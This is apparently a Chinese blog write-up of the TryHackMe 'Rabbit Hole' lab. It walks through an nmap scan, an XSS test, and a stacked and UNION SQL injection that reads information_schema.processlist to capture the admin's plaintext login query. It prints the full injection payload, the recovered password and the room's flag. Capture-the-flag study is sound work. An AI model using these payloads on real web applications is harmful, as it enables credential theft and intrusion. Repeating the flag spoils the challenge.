tryhackme靶场之Rabbit Hole
最近买了tryhackme的会员,试着刷刷渗透靶场(虽说这个兔子洞不需要会员也能刷)
信息收集
nmap开扫
nmap -sC -sV -oN nmap/initial 10.10.192.187 -v
只开了两个端口,ssh和http
http服务只有注册登录两个功能
登陆后发现admin每分钟都会登录一次
首先想xss注入
XSS
测试用户名为
1</th></tr></thead><tbody></table><script>alert(1)</script>可以弹窗但是无法把admin登录内容发过来
可能admin登录禁用了JavaScript甚至直接用脚本发包登录而不是正常开浏览器?
sql
试试sql注入?
尝试用户名为test"
发现sql语句报错
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"test"" ORDER BY login_time DESC LIMIT 0,5' at line 1
堆叠注入也成功了,那么直接脱库
然而只能注入拿到一个md5的密码,没什么用,猜测要拿到明文密码登陆进ssh
修改admin密码进去,也没啥特殊权限
联合注入,每一行最多只能显示 16 个字符,用substr绕过
有没有什么办法能做到拿到明文密码呢?卡住了。。。。
看了眼其他人的wp,学到一个新利用思路
监视查询
Information Schema PROCESSLIST Table - MariaDB Knowledge Base
根据官方文档可以看到,information_schema.processlist表中的info列包含正在查询的语句
只需要注册如下用户名然后一直刷新浏览器就能在admin登录时看到admin的登录sql语句
" union ALL select 0,SUBSTR(info,1, 16) from
information_schema.processlist where info not like "%info%" union ALL select 0,SUBSTR(info,17, 16) from
information_schema.processlist where info not like "%info%" union ALL select 0,SUBSTR(info,33, 16) from
information_schema.processlist where info not like "%info%" union ALL select 0,SUBSTR(info,49, 16) from
information_schema.processlist where info not like "%info%" union ALL select 0,SUBSTR(info,65, 16) from
information_schema.processlist where info not like "%info%" union ALL select 0,SUBSTR(info,81, 16) from
information_schema.processlist where info not like "%info%" union ALL select 0,SUBSTR(info,97, 16) from
information_schema.processlist where info not like "%info%" union ALL select 0,SUBSTR(info,113, 16) from
information_schema.processlist where info not like "%info%" union ALL select 0,SUBSTR(info,129, 16) from
information_schema.processlist where info not like "%info%" union ALL select 0,SUBSTR(info,145, 16) from
information_schema.processlist where info not like "%info%" union ALL select 0,SUBSTR(info,161, 16) from
information_schema.processlist where info not like "%info%" union ALL select 0,SUBSTR(info,177, 16) from
information_schema.processlist where info not like "%info%" union ALL select 0,SUBSTR(info,193, 16) from
information_schema.processlist where info not like "%info%" -- -
拿到密码
fEeFBqOXBOLmjpTt0B3LNpuwlr7mJxI9dR8kgTpbOQcLlvgmoCt35qogicf8ao0Qssh
ssh登录进去(注意用户是admi不是root)
即可拿到flag
THM{this_is_the_way_step_inside_jNu8uJ9tvKfH1n48}
可能是因为这个靶场比较简单,没有进一步的提权问题
学到了一个新姿势
所以说sql查询一定要先预处理,不能有明文,要在查询之前就先md5,最好加盐